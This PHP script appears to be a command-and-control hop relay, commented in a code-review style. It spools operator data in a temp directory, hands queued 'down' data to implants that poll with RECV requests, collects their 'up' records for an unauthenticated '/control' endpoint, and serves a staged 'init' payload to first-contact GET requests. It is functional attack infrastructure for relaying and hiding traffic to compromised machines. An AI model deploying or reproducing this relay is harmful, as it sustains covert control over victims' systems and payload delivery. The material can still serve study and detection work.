<?php
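// Marker written at the start of every "up_" record (see the POST handler
// below); it is also part of the spool directory name.
$magic = 'TzGq';
// Spool directory for relayed data, under the system temp dir. The path is
// fixed, so a stale directory from an earlier run is reused as-is.
$tempdir = sys_get_temp_dir() . "/hop" . $magic;
if(!is_dir($tempdir)){
    // Create it owner-only: the default mode (0777 masked by umask) would leave
    // the spooled request/response data readable and writable by every local
    // user sharing the temp dir. Failure stays best-effort here; the fopen()
    // calls further down report it on the request that actually needs the dir.
    mkdir($tempdir, 0700);
}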
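//get url
// The raw query string is the only routing input: "/control" selects the
// control endpoint, anything else is treated as a session identifier.
// Default to '' when the SAPI does not populate QUERY_STRING (e.g. CLI) so the
// string comparisons below never see null or an undefined-index notice.
$url = isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : '';
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr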
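/**
 * Streams every spool file in $tempdir whose name starts with $prefix to the
 * client and deletes each one after it has been sent.
 *
 * Only the file name is matched (not the contents). Entries are visited in
 * readdir() order, which is not defined.
 *
 * @param string $tempdir spool directory (created at the top of this script)
 * @param string $prefix  file-name prefix to match, e.g. "up_" or "down_<sha1>"
 * @param bool   $one     stop after the first match (default) instead of
 *                        draining every matching file
 * @return void
 */
function findSendDelete($tempdir, $prefix, $one=true){
    // An empty prefix would match "." and ".." as well; nothing sensible to send.
    if($prefix === ''){
        return;
    }
    $dh = opendir($tempdir);
    if($dh === false){
        return;
    }
    while(($file = readdir($dh)) !== false){
        // strpos() is 0 only when $prefix sits at the very start of the name;
        // it is false (no match) or >0 (match elsewhere) otherwise.
        if(strpos($file, $prefix) !== 0){
            continue;
        }
        $path = $tempdir."/".$file;
        readfile($path);
        unlink($path);
        if($one){
            break;
        }
    }
    // Release the directory handle instead of leaving it to script shutdown.
    closedir($dh);
}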
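//handle control
// Request dispatch, keyed on $url (the query string) and the HTTP method:
//   POST /control          store posted data as a "down_<sha1 urlfrag>" spool
//                          file, or as the single "init" file when X-Init is set
//   GET  /control          drain every "up_" spool file to the client
//   POST <session id>      record the body as an "up_" file; a RECV poll also
//                          sends back any queued "down_" data for that id
//   GET  containing 12345  serve the "init" file
// NOTE(review): /control is guarded only by knowledge of the path; nothing here
// authenticates who may read or queue spooled data.
$method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : 'GET';
if($url === "/control"){
    if($method === 'POST'){
        //handle data for payload - save in a "down" file or the "init" file
        $postdata = file_get_contents("php://input");
        if($postdata === false){
            $postdata = '';
        }
        if(array_key_exists('HTTP_X_INIT', $_SERVER)){
            $fname = $tempdir."/init"; //only one init file
        }else{
            // The header value is hashed, so request-controlled text never
            // becomes part of a filesystem path; a missing header hashes ''.
            $urlfrag = isset($_SERVER['HTTP_X_URLFRAG']) ? $_SERVER['HTTP_X_URLFRAG'] : '';
            $fname = tempnam($tempdir, "down_" . sha1($urlfrag));
        }
        $f = ($fname === false) ? false : fopen($fname, "w");
        if($f === false){
            // Spool dir unwritable or tempnam() failed: report it rather than
            // calling fwrite() on a non-resource.
            http_response_code(500);
            exit;
        }
        fwrite($f, $postdata);
        fclose($f);
    }else{
        findSendDelete($tempdir, "up_", false);
    }
}else if($method === 'POST'){
    //get data
    $postdata = file_get_contents("php://input");
    if($postdata === false){
        $postdata = '';
    }
    //See if we should send anything down
    if($postdata === "RECV\x00" || $postdata === "RECV"){
        // $url is hashed before it touches the filesystem, same as above.
        findSendDelete($tempdir, "down_" . sha1($url));
        $fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
    }else{
        $fname = tempnam($tempdir, "up_"); //actual data gets its own filename
    }
    //find free and write new file
    $f = ($fname === false) ? false : fopen($fname, "w");
    if($f === false){
        http_response_code(500);
        exit;
    }
    // Record layout: magic, then (little-endian uint32 length, bytes) for the
    // session id and again for the request body.
    fwrite($f, $magic);
    fwrite($f, pack('V', strlen($url)));
    fwrite($f, $url);
    fwrite($f, pack('V', strlen($postdata)));
    fwrite($f, $postdata);
    fclose($f);
//Initial query will be a GET and have a 12345 in it
}else if(strpos($url, "12345") !== false){
    $init = $tempdir."/init";
    // Nothing staged yet: answer with an empty body instead of a readfile() warning.
    if(is_file($init)){
        readfile($init);
    }
}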